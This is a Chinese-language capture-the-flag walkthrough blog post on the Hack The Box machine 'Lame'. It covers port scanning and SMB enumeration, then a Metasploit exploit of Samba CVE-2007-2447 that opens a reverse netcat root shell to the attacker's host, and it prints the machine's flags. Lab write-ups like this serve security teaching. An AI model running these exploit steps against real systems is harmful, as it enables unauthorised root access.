iT邦幫忙

2024 iThome 鐵人賽

DAY 28
0
自我挑戰組

從零開始:資安滲透初探系列 第 28

24: 資安滲透初探: HTB靶機入門: Lame (Linux)

  • 分享至 

  • xImage
  •  

今天繼續打簡單的靶機

https://app.hackthebox.com/machines/Lame
靶機介紹:
Lame 是一台簡單的 Linux 機器,只需一個漏洞即可獲取 root 訪問權限。它是 Hack The Box 上首個公開的機器,並且在退役之前,常常是新用戶的第一台機器。

Task 1: How many of the nmap top 1000 TCP ports are open on the remote host?

```bash
┌──(kali㉿kali)-[~]
└─$ nmap -Pn -sV 10.10.10.3       
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-25 04:21 EDT
Nmap scan report for 10.10.10.3
Host is up (0.28s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 42.05 seconds
```

Task 2: What version of VSFTPd is running on Lame?

```bash
┌──(kali㉿kali)-[~]
└─$ nmap -Pn -sV 10.10.10.3       
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-25 04:21 EDT
Nmap scan report for 10.10.10.3
Host is up (0.28s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 42.05 seconds
```

Task 3: There is a famous backdoor in VSFTPd version 2.3.4, and a Metasploit module to exploit it. Does that exploit work here?

```bash
msfconsole

msf6 > search vsftpd

Matching Modules
================

   #  Name                                  Disclosure Date  Rank       Check  Description
   -  ----                                  ---------------  ----       -----  -----------
   0  auxiliary/dos/ftp/vsftpd_232          2011-02-03       normal     Yes    VSFTPD 2.3.2 Denial of Service
   1  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution

Interact with a module by name or index. For example info 1, use 1 or use exploit/unix/ftp/vsftpd_234_backdoor

msf6 > use exploit/unix/ftp/vsftpd_234_backdoor 
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options 

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CHOST                     no        The local client address
   CPORT                     no        The local client port
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/usin
                                       g-metasploit.html
   RPORT    21               yes       The target port (TCP)

Exploit target:

   Id  Name
   --  ----
   0   Automatic

View the full module info with the info, or info -d command.

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 10.10.10.3
RHOSTS => 10.10.10.3
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run

[*] 10.10.10.3:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.10.10.3:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.
```

Task 4: What version of Samba is running on Lame? Give the numbers up to but not including "-Debian".

```bash
┌──(kali㉿kali)-[~]
└─$ smbclient -L //10.10.10.3 -N 
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        tmp             Disk      oh noes!
        opt             Disk      
        IPC$            IPC       IPC Service (lame server (Samba 3.0.20-Debian))
        ADMIN$          IPC       IPC Service (lame server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            LAME
```

- ChatGPT: 嘗試使用 `smbclient`、`enum4linux` 或 Metasploit 的 `smb_version` 模組來進一步確認 Samba 的具體版本
    
    要進一步確認 `Samba` 的具體版本,你可以使用以下幾種方法來獲取更詳細的信息。
    
    ### 1. **使用 `smbclient`**:
    
    - `smbclient` 是一個命令行工具,用於訪問 SMB 共享。你可以使用它來嘗試獲取 Samba 的具體版本信息。
    
    ### 步驟:
    
    1. 打開終端並運行以下命令來連接到靶機的共享:
        
        ```bash
        smbclient -L //10.10.10.3 -N
        
        ```
        
        - `L` 參數列出所有共享。
        - `N` 表示不需要密碼。
    2. 在 `smbclient` 的輸出中,查看是否有關於 Samba 具體版本的信息。
    
    ### 2. **使用 `enum4linux`**:
    
    - `enum4linux` 是一個專門用來枚舉和收集 Windows 和 Samba 系統信息的工具,它可以幫助你確定 Samba 的版本。
    
    ### 步驟:
    
    1. 運行以下命令來掃描靶機:
        
        ```bash
        enum4linux -a 10.10.10.3
        
        ```
        
    2. 查看輸出結果,找到與 Samba 相關的部分,這裡通常會顯示更具體的版本信息。
    
    ### 3. **使用 Metasploit 模組**:
    
    - Metasploit 中有一個專門用於枚舉 Samba 版本的輔助模組。
    
    ### 步驟:
    
    1. 在 `msfconsole` 中啟動 Metasploit:
        
        ```bash
        msfconsole
        
        ```
        
    2. 使用 `auxiliary/scanner/smb/smb_version` 模組來獲取 Samba 版本:
        
        ```bash
        use auxiliary/scanner/smb/smb_version
        set RHOSTS 10.10.10.3
        run
        
        ```
        
    3. 這個模組的輸出應該會提供 Samba 的具體版本號。
    
    ### 總結:
    
    - 嘗試使用 `smbclient`、`enum4linux` 或 Metasploit 的 `smb_version` 模組來進一步確認 Samba 的具體版本。
    - 在這些工具的輸出中,你應該能夠找到更詳細的版本信息,從而回答問題。
    
    如果你在過程中遇到任何問題或需要更多幫助,隨時告訴我!
    

Task 5: What 2007 CVE allows for remote code execution in this version of Samba via shell metacharacters involving the SamrChangePassword function when the "username map script" option is enabled in smb.conf?

- 用Metasploit來找漏洞
    
    ```bash
    msf6 > search samba
    
    Matching Modules
    ================
    
       #   Name                                                         Disclosure Date  Rank       Check  Description
       -   ----                                                         ---------------  ----       -----  -----------
    		...
    		...
       15  exploit/multi/samba/usermap_script                           2007-05-14       excellent  No     Samba "username map script" Command Execution
    ```
    
- 查看詳細資訊
    
    ```bash
    msf6 exploit(multi/samba/usermap_script) > show info 
    
           Name: Samba "username map script" Command Execution
         Module: exploit/multi/samba/usermap_script
       Platform: Unix
           Arch: cmd
     Privileged: Yes
        License: Metasploit Framework License (BSD)
           Rank: Excellent
      Disclosed: 2007-05-14
    
    Provided by:
      jduck <jduck@metasploit.com>
    
    Available targets:
          Id  Name
          --  ----
      =>  0   Automatic
    
    Check supported:
      No
    
    Basic options:
      Name    Current Setting  Required  Description
      ----    ---------------  --------  -----------
      RHOSTS                   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-
                                         metasploit.html
      RPORT   139              yes       The target port (TCP)
    
    Payload information:
      Space: 1024
    
    Description:
      This module exploits a command execution vulnerability in Samba
      versions 3.0.20 through 3.0.25rc3 when using the non-default
      "username map script" configuration option. By specifying a username
      containing shell meta characters, attackers can execute arbitrary
      commands.
    
      No authentication is needed to exploit this vulnerability since
      this option is used to map usernames prior to authentication!
    
    References:
      https://nvd.nist.gov/vuln/detail/CVE-2007-2447
      OSVDB (34700)
      http://www.securityfocus.com/bid/23972
      http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534
      http://samba.org/samba/security/CVE-2007-2447.html
    
    View the full module info with the info -d command.
    ```
    

Task 6: Exploiting CVE-2007-2447 returns a shell as which user?

- 利用漏洞
    
    ```bash
    msf6 exploit(multi/samba/usermap_script) > show options 
    
    Module options (exploit/multi/samba/usermap_script):
    
       Name    Current Setting  Required  Description
       ----    ---------------  --------  -----------
       RHOSTS                   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using
                                          -metasploit.html
       RPORT   139              yes       The target port (TCP)
    
    Payload options (cmd/unix/reverse_netcat):
    
       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       LHOST  192.168.242.130  yes       The listen address (an interface may be specified)
       LPORT  4444             yes       The listen port
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Automatic
    
    View the full module info with the info, or info -d command.
    
    msf6 exploit(multi/samba/usermap_script) > set RHOSTS 10.10.10.3
    RHOSTS => 10.10.10.3
    msf6 exploit(multi/samba/usermap_script) > set LHOST 10.10.16.2
    LHOST => 10.10.16.2
    msf6 exploit(multi/samba/usermap_script) > run
    
    [*] Started reverse TCP handler on 10.10.16.2:4444 
    [*] Command shell session 1 opened (10.10.16.2:4444 -> 10.10.10.3:52012) at 2024-08-25 04:45:51 -0400
    
    whoami
    root
    ```
    

Task 7: Submit the flag located in the makis user's home directory.

- 到指定位置找flag
    
    ```bash
    cd /home/makis
    ls
    user.txt
    cat user.txt
    383601fde3549ac80a5189cebcc5e0a3
    ```
    

Task 8: Submit the flag located in root's home directory.

- 到指定位置找flag
    
    ```bash
    cd ~
    pwd
    /root
    ls -al
    total 80
    drwxr-xr-x 13 root root 4096 Aug 25 04:21 .
    drwxr-xr-x 21 root root 4096 Oct 31  2020 ..
    -rw-------  1 root root  373 Aug 25 04:21 .Xauthority
    lrwxrwxrwx  1 root root    9 May 14  2012 .bash_history -> /dev/null
    -rw-r--r--  1 root root 2227 Oct 20  2007 .bashrc
    drwx------  3 root root 4096 May 20  2012 .config
    drwx------  2 root root 4096 May 20  2012 .filezilla
    drwxr-xr-x  5 root root 4096 Aug 25 04:21 .fluxbox
    drwx------  2 root root 4096 May 20  2012 .gconf
    drwx------  2 root root 4096 May 20  2012 .gconfd
    drwxr-xr-x  2 root root 4096 May 20  2012 .gstreamer-0.10
    drwx------  4 root root 4096 May 20  2012 .mozilla
    -rw-r--r--  1 root root  141 Oct 20  2007 .profile
    drwx------  5 root root 4096 May 20  2012 .purple
    -rwx------  1 root root    4 May 20  2012 .rhosts
    drwxr-xr-x  2 root root 4096 May 20  2012 .ssh
    drwx------  2 root root 4096 Aug 25 04:21 .vnc
    drwxr-xr-x  2 root root 4096 May 20  2012 Desktop
    -rwx------  1 root root  401 May 20  2012 reset_logs.sh
    -rw-------  1 root root   33 Aug 25 04:21 root.txt
    -rw-r--r--  1 root root  118 Aug 25 04:21 vnc.log
    cat root.txt
    a88eab69f724aceb3b0e1cbb5fbddb46
    ```
    

Task 9: We'll explore a bit beyond just getting a root shell on the box. While the official writeup doesn't cover this, you can look at 0xdf's write-up for more details. With a root shell, we can look at why the VSFTPd exploit failed. Our initial nmap scan showed four open TCP ports. Running netstat -tnlp shows many more ports listening, including ones on 0.0.0.0 and the boxes external IP, so they should be accessible. What must be blocking connection to these ports?

ChatGPT:
要回答這個問題,你需要了解網絡端口的運作方式以及可能阻止外部連接的原因。問題提到 `netstat -tnlp` 命令顯示了許多正在監聽的端口,但這些端口無法通過外部連接訪問,這意味著存在某種網絡防護機制在阻止這些連接。

### 1. **使用 `netstat -tnlp` 查看正在監聽的端口**:

- `netstat -tnlp` 命令顯示了靶機上所有正在監聽的 TCP 端口,並且這些端口應該在靶機上對外部連接開放。
- 如果你在 Shell 中,可以運行以下命令來查看這些端口:
    
    ```bash
    netstat -tnlp
    
    ```
    
- 這將列出所有監聽端口及其對應的應用程序。

### 2. **考慮可能的阻塞機制**:

- 即使端口在本地監聽並且理論上應該對外部開放,仍然有一些原因可能會阻止外部連接到這些端口。這些原因包括:
    - **防火牆(Firewall)**:靶機上可能運行了防火牆,並且配置了規則阻止外部連接到這些端口,即使它們在本地監聽。
    - **TCP Wrappers**:某些系統使用 TCP Wrappers 來限制哪些 IP 地址可以訪問哪些服務。這通常在 `/etc/hosts.allow` 和 `/etc/hosts.deny` 文件中配置。
    - **外部防火牆或網絡配置**:如果靶機位於受防火牆保護的網絡中,該網絡可能阻止了外部對這些端口的訪問。

### 3. **結論和回答**:

- 問題的答案很可能是 `防火牆` 或 `TCP Wrappers` 阻止了外部連接到這些端口。
- 具體回答應該是:
    
    ```
    防火牆(Firewall)或 TCP Wrappers
    
    ```
    

這意味著即使這些端口在本地監聽,防火牆或 TCP Wrappers 可能限制了外部連接的訪問。

### 總結:

- 使用 `netstat -tnlp` 查看靶機上所有監聽的端口。
- 考慮防火牆或 TCP Wrappers 可能阻止外部對這些端口的訪問。
- 提交答案時,可以回答 `防火牆(Firewall)或 TCP Wrappers`。

如果你有更多問題或需要進一步的幫助,隨時告訴我!

Task 10: When the VSFTPd backdoor is trigger, what port starts listening?

當 `VSFTPd` 後門被觸發時,它會在 **TCP 端口 6200** 上開始監聽。

這是因為 `VSFTPd` 2.3.4 版本中存在一個已知的後門漏洞(CVE-2011-2523),當用戶名為 `: )` 的特殊字符串時,該後門會被觸發,並在端口 `6200` 上打開一個 Shell,允許攻擊者遠程執行命令。

Task 11: When the VSFTPd backdoor is triggered, does port 6200 start listening on Lame?

    - **答案YES:** 當 `VSFTPd` 後門被觸發時,端口 `6200` 開始監聽。

上一篇
23: 資安滲透初探: HTB靶機入門: Blue
下一篇
25: 資安滲透初探: HTB靶機入門: Legacy (windows)
系列文
從零開始:資安滲透初探30
圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言